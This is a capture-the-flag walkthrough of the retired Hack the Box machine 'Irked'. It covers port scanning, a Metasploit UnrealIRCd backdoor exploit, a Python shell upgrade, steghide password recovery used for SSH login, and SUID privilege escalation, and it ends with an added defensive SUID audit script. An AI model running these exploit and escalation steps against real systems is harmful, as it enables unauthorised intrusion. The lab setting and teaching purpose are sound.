Hack the Box – Irked Walkthrough

Today, we’re going to solve another CTF machine, “Irked”. It is now a retired box and is accessible to VIP members.

Specifications

  • Target OS: Linux
  • IP Address: 10.10.10.117
  • Difficulty: Easy

Contents

  • Getting user
  • Getting root

Reconnaissance

As always, the first step is the reconnaissance phase, starting with port scanning.

Port Scanning

During this step we’re gonna identify the target to see what we have behind the IP Address.

nmap -p 1-65535 -T4 -A -v -oA intense-tcp 10.10.10.117

22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (EdDSA)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
| http-methods:
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          53832/tcp  status
|   100024  1          58245/udp  status
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
53832/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd

Enumeration

Let’s browse URL http://10.10.10.117/

If we take a look at view-source:http://10.10.10.117/ we find nothing but an image.

Steganography

Let’s wget irked.jpg and look for hidden information inside the image.

xxd irked.jpg
strings irked.jpg

If we try to extract information with steghide, it asks for a password, which is odd.

steghide extract -sf irked.jpg

Let’s keep this aside for now and move ahead.

Exploitation

The nmap scan reveals that UnrealIRCd is installed; let’s find out which version it is. We can connect to IRC using HexChat and see the response.

It revealed version 3.2.8.1 for UnrealIRCd.

Let’s searchsploit unrealircd and see if there’s any exploit available for this version.

We have a bunch of exploits; let’s test them.

Metasploit

Let’s fire up msfconsole and search unreal

msf5 > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rhosts 10.10.10.117
rhosts => 10.10.10.117
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rport 6697
rport => 6697

Now let’s exploit and see magic.

We have a restricted shell; let’s upgrade our shell using Python.

python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm

We found the user.txt flag inside /home/djmardov/Documents but don’t have permission to read it.

ircd@irked:/home/djmardov/Documents$ pwd
pwd
/home/djmardov/Documents
ircd@irked:/home/djmardov/Documents$ ls -la
ls -la
total 16
drwxr-xr-x  2 djmardov djmardov 4096 May 15  2018 .
drwxr-xr-x 18 djmardov djmardov 4096 Nov  3 04:40 ..
-rw-r--r--  1 djmardov djmardov   52 May 16  2018 .backup
-rw-------  1 djmardov djmardov   33 May 15  2018 user.txt
ircd@irked:/home/djmardov/Documents$ wc -c user.txt
wc -c user.txt
wc: user.txt: Permission denied

To read the flag we have to get a shell as the djmardov user. However, if you take a look at the .backup file, we do have read permission on it.

ircd@irked:/home/djmardov/Documents$ cat .backup
cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

It says steg backup password. Since we found an irked.jpg image and it was password protected, we can try extracting information using this password.

Steghide extracted a pass.txt file successfully and it contains another password.

Kab6h+m+bbp2J:HG

We can assume that it’s an SSH password for djmardov because we saw the SSH port open. Let’s try our luck.

root@m4sterph0enix:~# ssh djmardov@10.10.10.117
djmardov@10.10.10.117's password: Kab6h+m+bbp2J:HG
djmardov@irked:~$

Now, we can successfully read the user.txt flag.

Privilege Escalation

We can use scripts to find odd things or we could just manually enumerate for things.

Let’s get started!

djmardov@irked:~$ sudo -l
-bash: sudo: command not found

Let’s see which services and applications are running as root and look for anything interesting.

ps aux | grep root
ps -ef | grep root

Let’s find SUID files.

find / -perm -u=s -type f 2>/dev/null

OR

find / -perm -u=s -type f -maxdepth 6 -exec ls -ld {} \; 2>/dev/null

This file /usr/bin/viewuser seems odd because it’s recently modified.

djmardov@irked:~# /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2019-04-28 22:35 (:0)
djmardov pts/2 2019-05-04 05:58 (10.10.14.6)

Now, if we execute /usr/bin/viewuser, it runs our /tmp/listusers and opens a shell as root, because viewuser executes as root.

And we got the root flag.

root@irked:~# id
uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
root@irked:~# wc -c /root/root.txt
33 /root/root.txt
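
From the defender's side, the viewuser finding comes down to a SUID root binary that references a file in a directory any user can write to. The script below is an added example, not part of the original walkthrough: it extends the find commands above into an audit that reports SUID files with embedded paths under world-writable directories. The function names and the directory list are assumptions made for this example.

```sh
#!/bin/sh
# Added example: audit SUID binaries for references to world-writable paths.

# Directories any local user can write to (assumed list; extend per host).
WRITABLE_RE='/(tmp|var/tmp|dev/shm)/[A-Za-z0-9._/-]+'

# Print each distinct world-writable path embedded in the file "$1",
# one per line. grep -a reads the binary as text and -o prints only the
# matched path; LC_ALL=C keeps non-ASCII bytes from breaking the match.
embedded_writable_paths() {
    LC_ALL=C grep -a -o -E "$WRITABLE_RE" "$1" 2>/dev/null | sort -u
}

# Walk the tree under "$1" (default /) for SUID regular files, staying on
# one filesystem, and report every file that references a world-writable
# path. The ls -ld line shows owner and modification time for triage.
audit_suid() {
    find "${1:-/}" -xdev -type f -perm -u=s 2>/dev/null |
    while IFS= read -r suid_file; do
        embedded_writable_paths "$suid_file" |
        while IFS= read -r ref; do
            printf '%s references %s\n' "$suid_file" "$ref"
            ls -ld "$suid_file"
        done
    done
}

# Usage on a host being reviewed:
#   audit_suid /
```

A hit is a lead for review rather than proof of a flaw: the binary may only read or write the file, and running something from a world-writable directory is the case to fix, by using a root-owned absolute path or by removing the SUID bit.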